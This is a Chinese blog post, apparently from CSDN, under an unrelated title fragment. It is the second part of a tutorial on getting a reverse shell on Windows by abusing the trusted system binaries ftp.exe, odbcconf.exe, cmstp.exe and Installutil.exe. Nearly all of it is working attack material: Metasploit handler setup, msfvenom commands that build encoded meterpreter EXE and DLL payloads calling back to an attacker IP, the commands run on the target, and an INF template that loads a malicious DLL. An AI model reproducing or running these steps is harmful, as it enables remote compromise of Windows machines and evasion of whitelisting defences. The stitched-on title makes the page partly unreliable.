windows qtl cartographer 2.5使用说明_windows下基于白名单获取shell的方法整理(下)...

前言

继上篇内容继续。

特别感谢Micropoor前辈

内容列表

ftp.exe

  • 通过msfvenom发起ftp攻击

ODBCCONF.exe

  • 通过rundll32.exe+ODBCCONF.exe+hta进行攻击

cmstp.exe

  • 通过msfvenom发起cmstp.exe攻击

Installutil.exe

  • 通过msfvenom发起Installutil.exe攻击

ftp.exe

Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。

Ftp.exe所在路径已被系统添加PATH环境变量中,因此,Ftp.exe命令可识别。

Windows 2003 默认位置:

C:WindowsSystem32ftp.exe

C:WindowsSysWOW64ftp.exe

Windows 7 默认位置:

C:WindowsSystem32ftp.exe

C:WindowsSysWOW64ftp.exe

msf启用监听

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.43.231msf exploit(multi/handler) >  set AutoRunScript migrate -fmsf exploit(multi/handler) > set lport 53msf exploit(multi/handler) > exploit
bb57503c451a909214b033a1f211d350.png

生成payload

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 192.168.43.231 LPORT=53 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -o payload.exe
f087e2959311917ad171dc09d9956cd1.png

靶机执行(payload传到靶机上)

echo !C:payload.exe > o &&echo quit >> o &Ftp ‐n ‐s:o &&del /F /Q o
9e789f5e5a266a307e77405a551075e1.png

ODBCCONF.exe

ODBCCONF.exe是一个命令行工具,允许配置ODBC驱动程序和数据

说明:Odbcconf.exe所在路径已被系统添加PATH环境变量中,因此,Odbcconf命令可识

别,需注意x86,x64位的Odbcconf调用。

Windows 2003 默认位置:

C:WINDOWSsystem32odbcconf.exe

C:WINDOWSSysWOW64odbcconf.exe

Windows 7 默认位置:

C:WindowsSystem32odbcconf.exe

C:WindowsSysWOW64odbcconf.exe

msf启用监听

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.43.231msf exploit(multi/handler) >  set AutoRunScript migrate -fmsf exploit(multi/handler) > set lport 53msf exploit(multi/handler) > exploit

生成dll

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 92.168.43.231 LPORT=53  -f dll -o payload.dll
b137aae8c7bfd23379b4fc4b955cbbf5.png

靶机执行以下代码(注意payload版本)

odbcconf.exe /a {regsvr C:payload.dll}
71e1a7b8bb15a93ac0f6aa42e0a8e9da.png

cmstp.exe

Cmstp安装或删除“连接管理器”服务配置文件。如果不含可选参数的情况下使用,则

cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。

说明:Cmstp.exe所在路径已被系统添加PATH环境变量中,因此,Cmstp命令可识别,需

注意x86,x64位的Cmstp调用。

Windows 2003 默认位置:

C:WindowsSystem32cmstp.exe

C:WindowsSysWOW64cmstp.exe

Windows 7 默认位置:

C:WindowsSystem32cmstp.exe

C:WindowsSysWOW64cmstp.exe

msf启用监听

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.43.231msf exploit(multi/handler) >  set AutoRunScript migrate -fmsf exploit(multi/handler) > set lport 53msf exploit(multi/handler) > exploit

准备inf文件,以下是模板

[version]Signature=$chicago$AdvancedINF=2.5[DefaultInstall_SingleUser]RegisterOCXs=RegisterOCXSection[RegisterOCXSection]C:payload.dll[Strings]AppAct = "SOFTWAREMicrosoftConnection Manager" ServiceName="safe6" ShortSvcName="safe6"

INF 文件的 RegisterOCXSection 需要包含恶意 DLL 文件的本地路径或远程执行的 WebDAV 位置

然后再靶机执行以下命令

cmstp /s safe6.inf
c7246a7f2b2370e23fa8b08e3627cdf0.png

Installutil.exe

Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来

安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用

说明:Installutil.exe所在路径没有被系统添加PATH环境变量中,因此,Installutil命令无法

识别。

生成payload用以下工具(里面写的很清楚了)

https://github.com/khr0x40sh/WhiteListEvasion

ac6fe99c2b8f30f5f4a4e62b6ad7adcd.png

临时有事,不再演示这个

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值